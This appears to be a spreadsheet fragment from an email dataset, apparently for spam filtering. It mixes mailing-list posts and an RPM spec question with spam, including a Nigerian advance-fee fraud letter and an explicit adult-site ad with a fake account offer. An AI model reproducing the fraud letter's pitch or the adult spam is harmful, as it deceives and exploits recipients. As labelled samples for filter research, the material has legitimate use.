 surefiremarketing@btamail.net.cn  with remove as your subject. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: New Solar System body revealed
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8640496,1440/
 Date: Not supplied
 The largest object found since 1930 is half the size of Pluto, and calls that 
 object's planetary status into question
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re[2]: Oh my...
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Chris,
 Oh I don't know, Time-lag synchrocity?
 Or mutual shared experience over time?
 :)
 Its like 930 am..I can't function yet.  Lord knows its 630 where you
 are.
 I say this should be a FoRK Posit.
 CO&gt; Scary.  I was just listening to the radio (stream, from KUOW), and heard
 CO&gt; the story just moments ago.
 CO&gt; We're on opposite sides of the continent, yet we appear to have just had a
 CO&gt; shared experience.  There should be a name for that...
 CO&gt; Cheers -
 CO&gt;         /cco
 CO&gt; On Sat, 21 Sep 2002 bitbitch@magnesium.net wrote:
 &gt;&gt; 
 &gt;&gt;   So they have Aaron Schwartz on NPR's Weekend Edition talking
 &gt;&gt;   about Warchalking.   I'll agree, its funny, his voice is squeaky and
 &gt;&gt;   I'm jealous that he got on radio and I didn't...
 -- 
 Best regards,
  bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Problem with my spec file
</t>
  </si>
  <si>
    <t xml:space="preserve">Can someone tell me what I am doing wrong? it's like make doesn't take the
 PREFIX override... It's crazy. I don't get it...
 OS: TurboLinux6 rmp3.0.6 make 3.79.1
 I just don't get this. It should work...
 ---
 %define real_name Mail-SpamAssassin
 %define real_version 2.31
 ########################################################################
 # Package Information
 ########################################################################
 Name:         SpamAssassin
 Version:      2.31
 Summary:      SpamAssassin - A perl-based spam filter
 URL:          http://www.spamassassin.org
 Group:        Networking/Mail
 License:      Artistic
 Release:      1
 ########################################################################
 # Sources/Patches
 ########################################################################
 Source0: http://spamassassin.org/devel/%{real_name}-%{real_version}.tar.gz
 ########################################################################
 # Build Configuration
 ########################################################################
 BuildRoot:          %{_builddir}/%{real_name}-%{real_version}-root
 BuildArchitectures: i586
 ########################################################################
 # Package Description
 ########################################################################
 %description
     SpamAssassin provides you with a way to reduce if not completely
 eliminate
     Unsolicited Commercial Email (SPAM) from your incoming email.  It can
     be invoked by a MDA such as sendmail or postfix, or can be called from
     a procmail script, .forward file, etc.  It uses a genetic-algorithm
     evolved scoring system to identify messages which look spammy, then
     adds headers to the message so they can be filtered by the user's mail
     reading software.  This distribution includes the spamd/spamc components
     which create a server that considerably speeds processing of mail.
 %prep
 %setup -q -n %{real_name}-%{real_version}
 ########################################################################
 # Compilation/Installation Instructions (use macros/switches if possible)
 ########################################################################
 %build
    %{__perl} Makefile.PL LOCAL_RULES_DIR=/etc/spamassassin
 INSTALLDIRS=vendor PREFIX=%{_prefix}
    make OPTIMIZE="$RPM_OPT_FLAGS" PREFIX=%{_prefix}
 %install
    rm -rf $RPM_BUILD_ROOT
    %makeinstall PREFIX=%{buildroot}%{_prefix} \
                 INSTALLMAN1DIR=%{buildroot}%{_mandir}/man1 \
                 INSTALLMAN3DIR=%{buildroot}%{_mandir}/man3 \
                 LOCAL_RULES_DIR=%{buildroot}%{_sysconfdir}/spamassassin
    install -m 0711 -D spamd/redhat-rc-script.sh
 %{buildroot}/etc/init.d/spamassassind
 %clean
    rm -rf $RPM_BUILD_ROOT
 ########################################################################
 # RPM file inclusion section (see CRUX guidelines)
 ########################################################################
 %files
 %defattr(-,root,root)
 %attr(0711,root,root) /etc/init.d/spamassassind
 %attr(0644,root,root) %config(noreplace) /etc/spamassassin/*
 %attr(0755,root,root) %dir %{_datadir}/spamassassin
 %attr(0755,root,root) %{_bindir}/*
 %attr(0644,root,root) %{_datadir}/spamassassin/*
 %attr(-,root,root) %{_libdir}/*
 ########################################################################
 # Changelog - Keep it short and simple
 ########################################################################
 %changelog
 * Sun Apr 28 2002 Victor &lt;vkd79@moon.rock&gt;
 - Initial Release
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: We Build The Internet.  WebXperts.com  (Design / Programming / Consultation)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 This is a multi-part message in MIME format
 --1d9d507a-d864-478d-ba24-917611e50332
 Content-Type: text/html; charset=iso-8859-1
 Content-Transfer-Encoding: quoted-printable
 &lt;!-- If this flyer does not appear correctly and/or images do not appear, go =
 to the following in your browser window www.webxperts.com --&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;WebXperts Design, Inc.    We Build The Internet.&lt;/title&gt;
 &lt;style type=3D"text/css"&gt;&lt;!--body{font-family: Verdana; font-size:10px; =
 color:white;}td{font-family:  Verdana; font-size:10px; =
 color:white;}a{font-family: Verdana; font-size:10px; =
 color:cccccc;}a:hover{font-family: Verdana; font-size:10px; =
 color:yellow;}--&gt;&lt;/style&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#666666"&gt;&lt;div align=3D"center"&gt;
 &lt;table width=3D"720"&gt;&lt;tr&gt;&lt;td&gt;&lt;hr&gt;
 If This Flyer does not appear correctly and/or images do not appear, please =
 click the following link: &lt;a href=3D=
 "http://www.webxperts.com"&gt;http://www.webxperts.com&lt;/a&gt;.&lt;hr align=3D=
 "center"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"720"&gt;
   &lt;tr&gt;   &lt;td&gt;&lt;img src=3D"http://www.eluxmedia.com/forms/spacer.gif" width=3D=
 "94" height=3D"1" border=3D"0"&gt;&lt;/td&gt;   &lt;td&gt;&lt;img src=3D=
 "http://www.eluxmedia.com/forms/spacer.gif" width=3D"106" height=3D"1" =
 border=3D"0"&gt;&lt;/td&gt;   &lt;td&gt;&lt;img src=3D=
 "http://www.eluxmedia.com/forms/spacer.gif" width=3D"47" height=3D"1" =
 border=3D"0"&gt;&lt;/td&gt;   &lt;td&gt;&lt;img src=3D=
 "http://www.eluxmedia.com/forms/spacer.gif" width=3D"59" height=3D"1" =
 border=3D"0"&gt;&lt;/td&gt;   &lt;td&gt;&lt;img src=3D=
 "http://www.eluxmedia.com/forms/spacer.gif" width=3D"119" height=3D"1" =
 border=3D"0"&gt;&lt;/td&gt;   &lt;td&gt;&lt;img src=3D=
 "http://www.eluxmedia.com/forms/spacer.gif" width=3D"34" height=3D"1" =
 border=3D"0"&gt;&lt;/td&gt;   &lt;td&gt;&lt;img src=3D=
 "http://www.eluxmedia.com/forms/spacer.gif" width=3D"73" height=3D"1" =
 border=3D"0"&gt;&lt;/td&gt;   &lt;td&gt;&lt;img src=3D=
 "http://www.eluxmedia.com/forms/spacer.gif" width=3D"111" height=3D"1" =
 border=3D"0"&gt;&lt;/td&gt;   &lt;td&gt;&lt;img src=3D=
 "http://www.eluxmedia.com/forms/spacer.gif" width=3D"77" height=3D"1" =
 border=3D"0"&gt;&lt;/td&gt;   &lt;td&gt;&lt;img src=3D=
 "http://www.eluxmedia.com/forms/spacer.gif" width=3D"1" height=3D"1" border=3D=
 "0"&gt;&lt;/td&gt;  &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td&gt;
  &lt;form action=3D"http://www.webxperts.com/webxflyer2002.asp" method=3D=
 "post"&gt;&lt;input type=3D"hidden" name=3D"email" value=3D=
 "zzzz@example.com"&gt;&lt;input type=3D"hidden" name=3D"m" value=3D=
 "sept2002"&gt;&lt;input type=3D"hidden" name=3D"page" value=3D"webdesign"&gt;&lt;input =
 type=3D"hidden" name=3D"typeof" value=3D"homes and apartments"&gt;&lt;INPUT TYPE=3D=
 "image" SRC=3D"http://www.eluxmedia.com/forms/flyer2002_r1_c1.gif" ALT=3D"Web =
 Design" &gt;&lt;/form&gt;
 &lt;/td&gt;
    &lt;td&gt;
  &lt;form action=3D"http://www.webxperts.com/webxflyer2002.asp" method=3D=
 "post"&gt;&lt;input type=3D"hidden" name=3D"email" value=3D=
 "zzzz@example.com"&gt;&lt;input type=3D"hidden" name=3D"m" value=3D=
 "sept2002"&gt;&lt;input type=3D"hidden" name=3D"page" value=3D"app_dev"&gt;&lt;input =
 type=3D"hidden" name=3D"typeof" value=3D"homes and apartments"&gt;&lt;INPUT TYPE=3D=
 "image" SRC=3D"http://www.eluxmedia.com/forms/flyer2002_r1_c2.gif" ALT=3D=
 "Application Development" &gt;&lt;/form&gt;
 &lt;/td&gt;
    &lt;td colspan=3D"2"&gt;
   &lt;form action=3D"http://www.webxperts.com/webxflyer2002.asp" method=3D=
 "post"&gt;&lt;input type=3D"hidden" name=3D"email" value=3D=
 "zzzz@example.com"&gt;&lt;input type=3D"hidden" name=3D"m" value=3D=
 "sept2002"&gt;&lt;input type=3D"hidden" name=3D"page" value=3D"webmain"&gt;&lt;input =
 type=3D"hidden" name=3D"typeof" value=3D"homes and apartments"&gt;&lt;INPUT TYPE=3D=
 "image" SRC=3D"http://www.eluxmedia.com/forms/flyer2002_r1_c3.gif" ALT=3D=
 "Website Maintenance" &gt;&lt;/form&gt;
 &lt;/td&gt;
    &lt;td&gt;
   &lt;form action=3D"http://www.webxperts.com/webxflyer2002.asp" method=3D=
 "post"&gt;&lt;input type=3D"hidden" name=3D"email" value=3D=
 "zzzz@example.com"&gt;&lt;input type=3D"hidden" name=3D"m" value=3D=
 "sept2002"&gt;&lt;input type=3D"hidden" name=3D"page" value=3D"guaranteed"&gt;&lt;input =
 type=3D"hidden" name=3D"typeof" value=3D"homes and apartments"&gt;&lt;INPUT TYPE=3D=
 "image" SRC=3D"http://www.eluxmedia.com/forms/flyer2002_r1_c5.gif" ALT=3D=
 "Guarenteed Site Placement" &gt;&lt;/form&gt;
  &lt;/td&gt;
    &lt;td colspan=3D"2"&gt;
   &lt;form action=3D"http://www.webxperts.com/webxflyer2002.asp" method=3D=
 "post"&gt;&lt;input type=3D"hidden" name=3D"email" value=3D=
 "zzzz@example.com"&gt;&lt;input type=3D"hidden" name=3D"m" value=3D=
 "sept2002"&gt;&lt;input type=3D"hidden" name=3D"page" value=3D"ecommerce"&gt;&lt;input =
 type=3D"hidden" name=3D"typeof" value=3D"homes and apartments"&gt;&lt;INPUT TYPE=3D=
 "image" SRC=3D"http://www.eluxmedia.com/forms/flyer2002_r1_c6.gif" ALT=3D=
 "E-Commerce Solutions" &gt;&lt;/form&gt;
  &lt;/td&gt;
    &lt;td&gt;
   &lt;form action=3D"http://www.webxperts.com/webxflyer2002.asp" method=3D=
 "post"&gt;&lt;input type=3D"hidden" name=3D"email" value=3D=
 "zzzz@example.com"&gt;&lt;input type=3D"hidden" name=3D"m" value=3D=
 "sept2002"&gt;&lt;input type=3D"hidden" name=3D"page" value=3D"wireless"&gt;&lt;input =
 type=3D"hidden" name=3D"typeof" value=3D"homes and apartments"&gt;&lt;INPUT TYPE=3D=
 "image" SRC=3D"http://www.eluxmedia.com/forms/flyer2002_r1_c8.gif" ALT=3D=
 "Wireless Development" &gt;&lt;/form&gt;
 &lt;/td&gt;
    &lt;td&gt;
   &lt;form action=3D"http://www.webxperts.com/webxflyer2002.asp" method=3D=
 "post"&gt;&lt;input type=3D"hidden" name=3D"email" value=3D=
 "zzzz@example.com"&gt;&lt;input type=3D"hidden" name=3D"m" value=3D=
 "sept2002"&gt;&lt;input type=3D"hidden" name=3D"page" value=3D"intranets"&gt;&lt;input =
 type=3D"hidden" name=3D"typeof" value=3D"homes and apartments"&gt;&lt;INPUT TYPE=3D=
 "image" SRC=3D"http://www.eluxmedia.com/forms/flyer2002_r1_c9.gif" ALT=3D=
 "Intranets" &gt;&lt;/form&gt;
 &lt;/td&gt;
    &lt;td&gt;&lt;img src=3D"http://www.eluxmedia.com/forms/spacer.gif" width=3D"1" =
 height=3D"33" border=3D"0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td colspan=3D"9"&gt;&lt;img name=3D"logoandmiddle" src=3D=
 "http://www.eluxmedia.com/forms/logoandmiddle.gif" width=3D"720" height=3D=
 "150" border=3D"0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img src=3D"http://www.eluxmedia.com/forms/spacer.gif" width=3D"1" =
 height=3D"150" border=3D"0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td colspan=3D"3"&gt;
  &lt;form action=3D"http://www.webxperts.com/webxflyer2002.asp" method=3D=
 "post"&gt;&lt;input type=3D"hidden" name=3D"email" value=3D=
 "zzzz@example.com"&gt;&lt;input type=3D"hidden" name=3D"m" value=3D=
 "sept2002"&gt;&lt;input type=3D"hidden" name=3D"page" value=3D"webdesign"&gt;&lt;input =
 type=3D"hidden" name=3D"typeof" value=3D"homes and apartments"&gt;&lt;INPUT TYPE=3D=
 "image" SRC=3D"http://www.eluxmedia.com/forms/flyer2002_r3_c1.gif" ALT=3D=
 "HTML Version" &gt;&lt;/form&gt;
 &lt;/td&gt;
    &lt;td colspan=3D"3"&gt;
  &lt;form action=3D"http://www.webxperts.com/webxflyer2002.asp" method=3D=
 "post"&gt;&lt;input type=3D"hidden" name=3D"email" value=3D=
 "zzzz@example.com"&gt;&lt;input type=3D"hidden" name=3D"m" value=3D=
 "sept2002"&gt;&lt;input type=3D"hidden" name=3D"page" value=3D"mixedmedia"&gt;&lt;input =
 type=3D"hidden" name=3D"typeof" value=3D"homes and apartments"&gt;&lt;INPUT TYPE=3D=
 "image" SRC=3D"http://www.eluxmedia.com/forms/flyer2002_r3_c4.gif" ALT=3D=
 "Mixed Media Version" &gt;&lt;/form&gt;
 &lt;/td&gt;
    &lt;td colspan=3D"3"&gt;
  &lt;form action=3D"http://www.webxperts.com/webxflyer2002.asp" method=3D=
 "post"&gt;&lt;input type=3D"hidden" name=3D"email" value=3D=
 "zzzz@example.com"&gt;&lt;input type=3D"hidden" name=3D"m" value=3D=
 "sept2002"&gt;&lt;input type=3D"hidden" name=3D"page" value=3D"flash"&gt;&lt;input type=3D=
 "hidden" name=3D"typeof" value=3D"homes and apartments"&gt;&lt;INPUT TYPE=3D"image" =
 SRC=3D"http://www.eluxmedia.com/forms/flyer2002_r3_c7.gif" ALT=3D"Flash =
 Version" &gt;&lt;/form&gt;
 &lt;/td&gt;
    &lt;td&gt;&lt;img src=3D"http://www.eluxmedia.com/forms/spacer.gif" width=3D"1" =
 height=3D"277" border=3D"0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"720"&lt;tr&gt;&lt;td&gt;&lt;br&gt;&lt;br&gt;&lt;hr align=3D"center"&gt;
 Your email address was obtained from a purchased list. You are receiving this =
 from Eluxmedia LLC, and are a part of their mailing list. If you wish to =
 unsubscribe from this list, please &lt;a href=3D=
 "http://www.eluxmedia.com/unsub/unsubscribe.asp"&gt;click here&lt;/a&gt; and enter =
 your name into the remove box.&lt;br&gt;&lt;br&gt;If you have previously unsubscribed and =
 are still receiving this message, you may email our &lt;a href=3D=
 "mailto:solutions@eluxmedia.com"&gt;Abuse Control Center&lt;/a&gt;.&lt;/font&gt;&lt;hr align=3D=
 "center"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;  
 --1d9d507a-d864-478d-ba24-917611e50332--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 'Top Law firm
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear debbiee ,
 &lt;!-- saved from url=(0022)http://internet.e-mail --&gt;
 &lt;HTML&gt;
 &lt;BODY text=#000000 bgColor=#ffffff&gt;
 	&lt;TABLE cellSpacing=0 cellPadding=0 width=399 border=0&gt;
 		&lt;TBODY&gt;
 		&lt;TR&gt;
 			&lt;TD align=center height=30 bgcolor=502080&gt;
 				&lt;font size=3 color=white face=tahoma,arial&gt;&lt;b&gt;
                 &lt;a href="http://www.mailcomesandgoes.com/leads/index.html?marketing_id=rh"&gt;Legal Services for Less than a Penny Per Day&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;
 			&lt;/TD&gt;
 		&lt;/TR&gt;
 		&lt;/TBODY&gt;
 	&lt;/TABLE&gt;
       &lt;TABLE cellSpacing=0 cellPadding=6 width=399 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top bgColor=#dfdff3&gt;
           &lt;FONT face="Arial, Helvetica, sans-serif" size=2&gt;
           You can have a &lt;B&gt;Top Law Firm&lt;/B&gt; in your area produce a 
           Will for you, &lt;B&gt;absolutely FREE&lt;/B&gt;, with your membership.
           &lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;
             &lt;TABLE cellSpacing=0 cellPadding=5 width="100%" border=0&gt;
               &lt;TBODY&gt;
               &lt;TR vAlign=center&gt;
                 &lt;TD width="100%"&gt;
 				&lt;B&gt;&lt;FONT face="Arial, Helvetica, sans-serif" color=#000000 size=2&gt;
 					 &amp;nbsp;Unlimited Legal Consultations&lt;br&gt;
 					 &amp;nbsp;Unlimited Phone Conversations&lt;br&gt;
 					 &amp;nbsp;Traffic Ticket Defense&lt;br&gt;
 					 &amp;nbsp;Contract &amp;amp; Document Review&lt;br&gt;
 					 &amp;nbsp;Letters and Calls Made on Your Behalf&lt;br&gt;
 					 &amp;nbsp;IRS Audit Protection&lt;br&gt;
 					 &amp;nbsp;Trial Defense&lt;br&gt;
 					 &amp;nbsp;Business &amp;amp; Family Protection&lt;br&gt;
 					 &amp;nbsp;Much More...
 				&lt;/FONT&gt;&lt;/B&gt;
 				&lt;/TD&gt;
               &lt;/TR&gt;
               &lt;/TBODY&gt;
             &lt;/TABLE&gt;
             &lt;FONT face="Arial, Helvetica, sans-serif" size=2&gt;
             &lt;BR&gt;&lt;B&gt;Why pay $200 or more&lt;/B&gt; an hour&lt;B&gt; 
             when you can get the same&lt;/B&gt; first rate service&lt;B&gt; 
             for less than $1 per day?&lt;/B&gt;&lt;BR&gt;&lt;BR&gt;&lt;FONT color=#663366&gt;
             &lt;B&gt;Get your FREE INFORMATION by clicking on the link below.&lt;/B&gt;
             &lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;
             &lt;/TD&gt;
           &lt;/TR&gt;
           &lt;/TBODY&gt;
         &lt;/TABLE&gt;
 		&lt;TABLE cellSpacing=0 cellPadding=0 width=399 border=0&gt;
 			&lt;TBODY&gt;
 			&lt;TR&gt;
 				&lt;TD align=center height=40 bgcolor=502080&gt;
 					&lt;font size=4 color=white face=tahoma,arial&gt;
 					&lt;b&gt;
                     &lt;a href="http://www.mailcomesandgoes.com/leads/index.html?marketing_id=rh"&gt;CLICK HERE FOR MORE INFORMATION&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;
 				&lt;/TD&gt;
 			&lt;/TR&gt;
 			&lt;/TBODY&gt;
 		&lt;/TABLE&gt;
 	   &lt;/TD&gt;
 	 &lt;/TR&gt;
 	 &lt;/TBODY&gt;
 	&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;CENTER&gt;&lt;BR&gt;
 &lt;HR width="100%" SIZE=1&gt;
 &lt;P align=left&gt;&lt;FONT face=Verdana,Arial size=1&gt;If you feel that you have received 
 this offer in error, or if you wish to unsubscribe, 
 please&lt;FONT face=Arial color=#0000ff size=2&gt;
 &lt;a href="mailto:http://61.129.81.99/tbone/remove.html"&gt;Click Here&lt;/a&gt;.
 &lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/FONT&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
  [PO1:KJ)_8J7BJK9^":}H&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Account zzzz@example.com
</t>
  </si>
  <si>
    <t xml:space="preserve">New Account For: zzzz@example.com 
 ##################################################
 #                                                #
 #                 Adult Club                     #
 #           Offers FREE Membership               #
 #                                                #
 #          3 of the Best Adult Sites             #
 #     on the Internet for Absolutely FREE        #
 #                                                #
 ##################################################
 &gt; &gt; &gt; &gt; YOU HAVE INSTANT ACCESS TO ALL 3 SITES NOW
 &gt; &gt; &gt; &gt; User Name: zzzz@example.com
 &gt; &gt; &gt; &gt; Password: 1534
 - - - - - - - - - - - - - - - - - - - -
 NEWS 09/24/02
 With just over 4.8 Million Members that signed up for FREE, Last month there were 921,947 New
 Members. Are you one of them yet???
 - - - - - - - - - - - - - - - - - - - -
 Our Membership FAQ
 Q. Why are you offering free access to 3 adult membership sites for free? 
 A. I have advertisers that pay me for ad space so you don't have to pay for membership.
 Q. Is it true my membership is for life?
 A. Absolutely you'll never have to pay a cent the advertisers do.
 Q. Can I give my account to my friends and family?
 A. Yes, as long they are over the age of 18.
 Q. Do I have to sign up for all 3 membership sites?
 A. No just one to get access to all of them.
 Q. How do I get started?
 A. Click on one of the following links below to become a member.
 &gt; &gt; &gt; &gt; Fill in the required info and they won't charge you for the Free
 Membership!
 &gt; &gt; &gt; &gt; If you don't believe us, just read their terms and conditions.
 - - - - - - - - - - - - - - - - - - - -
 # 3. &gt; Lucky Amateur Wives
 http://www.bozombo.com/luckyamateurwives/index.php?affid=1534
 You won't believe what we take these Wives into doing...FREE VIP Membership!!
 # 2. &gt; New! just added today: Cum Drinkers
 http://www.bozombo.com/cumdrinkers/index.php?affid=1534
 950,00 Pics, 90,000 Movies, Live Sex Shows... FREE Lifetime Membership!!
 # 1. &gt; Filthy Teen Sluts
 http://www.bozombo.com/filthyteensluts/index.php?affid=1534
 The Ultimate XXX TEEN Site... FREE VIP Membership!!
 - - - - - - - - - - - - - - - - - - - -
 Jennifer Simpson, Miami, FL
 Your FREE lifetime membership has entertained my boyffriend and I for the last two years!  Your
 Adult Sites are the best on the net!
 Joe Morgan Manhattan, NY
 Your live sex shows and live sex cams are unbelievable. The best part about your porn sites, is
 that they're absolutely FREE!
 - - - - - - - - - - - - - - - - - - - -
 Disclaimer:
 We are strongly against sending unsolicited emails to those who do not wish to receive our special
 mailings. You have opted in to one or more of our affiliate sites requesting to be notified of any
 special offers we may run from time to time. We also have attained the services of an independent
 3rd party to overlook list management and removal services. This is NOT unsolicited email. If you
 do not wish to receive further mailings, please go to http://greenzer.com/remove.php to be removed
 from the list. Please accept our apologies if you have been sent this email in error. We honor all
 removal requests.
 Thank you zzzz@example.com
 oldhtlheuhcclco
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: "KICK ME"
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=48335
 Date: Not supplied
 http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=48335
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Seeking Your Partnership
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Partner to be,
 First, I must apologise to you for using this medium to communicate to you
 about this project.
 I am a highly placed official of  Government of Nigeria and also a
 founding member of the ruling party in Power now,the Peoples Democratic
 Party(PDP).
 My committee - The Niger Delta Development Corporation(NDDC)-which is in
 charge of managing and supervising  the disbursement of oil sales revenues
 for the Nigerian government.The revenues  under our control runs into
 several hundred of millions of dollars monthly.My self and   
 other colleagues in the NDDC are currently in need of a foreign partner
 with whose bank account we shall transfer the sum of Forty Nine Million
 Five Hundred Thosand United States Dollars($49.5m).This fund accrued to us
 as commission for oil sales contracts handled under our supervision.
 The fund is presently waiting in the Government Account named CBN/FGN
 INDEPENDENT REVENUE account number 400-939134 with J.P.MORGAN CHASE
 BANK,New York.You can do your independent verifictaion of this. However,
 by virtue of our  position as civil servants and members of the NDDC, we
 cannot acquire this funds in our name. This is because as top civil
 servants, we are not allowed by law of the land to own or operate bank
 accounts outside our country for now.
 I have been delegated as a matter of trust by my colleagues,
 to look for an overseas partner in whose account we would
 transfer the fund
 Hence the reason for this mail.We shall be Transferring the money to your
 account with your company as we shall present your company as a registered
 Foreign company with a branch in Nigeria and you are been paid for a
 contract which you executed for our country through the NDDC and any oter
 Federal Ministry that we decide to use to siphon the funds away.
 For your support and partnership,please reply me to negotiate your fees or
 the percentage you wish to be paid when the funds arrive your bank account.
 You must however note that this transaction, with
 regards to our disposition to continue with you, is subject
 to these terms. Firstly, our conviction of your transparency.
 Secondly, that you treat this transaction with utmost secrecy
 and confidentiality. Finally and above all, that you will provide
 an account that you have absolute control over.
 The transaction, although discrete, is legitimate and there
 is no risk or legal disadvantages either to ourselves or yourself now or
 in the future as we have put in place perfect mchineries that will ensure
 a hitch free transfer into your account upon acceptance.
 The transfer will be effected to your account within ten-fourteen
 (10-14) working days as soon as we reach an agreement and you furnish
 me with a  suitable bank account and company name and address with all
 your contact numbers including fax number.
 I am looking forward to doing business with you and do solicit
 your confidentiality in this transaction,  Please mail your
 response to me.
 Yours faithfully,
 Anderson K. Eseimoku
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NEWS.COM INVESTOR: Techs lose again with Seibel earnings miss, AOL questions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</si>
  <si>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href="http://clickthru.online.com/Click?q=a0-11h8QQB7cNjxsKcUByjw2PB1s7iR"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href="http://clickthru.online.com/Click?q=b6-llkUQCKVBmZ9ju5T_PUCch20Lg4R" &gt;My Portfolio&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=cb-CjRIQJsQXvJS0OGyXYHRf_uaHkrR" &gt;Broker Reports&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=e0-cISRQfDxnLxFSC7kPhB7mxUT9AiR" &gt;IPOs&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=f5-lTbRQgwH2E6omcY6DmLwgkaZmRPR" &gt;Splits&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=0a-ZnKCIrrwX4R7AeWBwhq6GOxuYznR" &gt;Messages&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;!-- /nav --&gt;
 &lt;p&gt;
 &lt;!-- tech winners --&gt;
 &lt;img src="http://www.cnet.com/i/nl/inv/rhc_win.gif" width=160 height=20 alt="Tech Winners"&gt;&lt;br&gt;
 &lt;table width=160 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=1f-rvwqI58sviBXvpU1xmYgHobjqmeR" &gt;STIZ&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;3.5&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;45.77%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=34-pJpSIcdj2d53QT23_tvVyn4IcgyR" &gt;IIJI&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;4.75&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;35.71%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=49-ZM4cIEpGf4htn73VX4RVXFO5JSFR" &gt;BOYD&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;4.24&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;35.03%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKc1ZAbqV96fez6pa6cIJuR" &gt;INPH&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;3.94&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;31.25%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
